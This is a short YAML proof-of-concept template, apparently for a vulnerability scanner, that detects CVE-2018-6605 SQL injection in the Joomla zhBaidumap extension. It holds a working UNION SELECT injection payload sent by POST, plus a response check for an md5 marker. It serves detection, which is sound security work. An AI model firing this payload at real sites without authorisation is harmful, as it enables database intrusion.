name: poc-yaml-joomla-ext-zhbaidumap-cve-2018-6605-sqli
set:
  rand: randomInt(2000000000, 2100000000)
rules:
  - method: POST
    path: >-
      /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: >-
      id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{rand}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+
    follow_redirects: false
    expression: >
      response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) && response.body.bcontains(b"dataexists")
detail:
  author: leezp
  Affected Version: "zhBaidumap plugin 3.0.0.*"
  links:
    - https://www.exploit-db.com/exploits/43974
    - https://mp.weixin.qq.com/s?__biz=MzAxODg1MDMwOQ==&mid=2247489109&idx=1&sn=0c9a3388e4ac1389897b4449fb3afNULL0&chksm=9bcea13facb928293ac06fede04f15d564b60a5e8ad26208f28ebe175017aa3d2144617f2b60&mpshare=1&scene=23&srcid=0418r0yqNrZ1hyGCdDHl8EK1#rd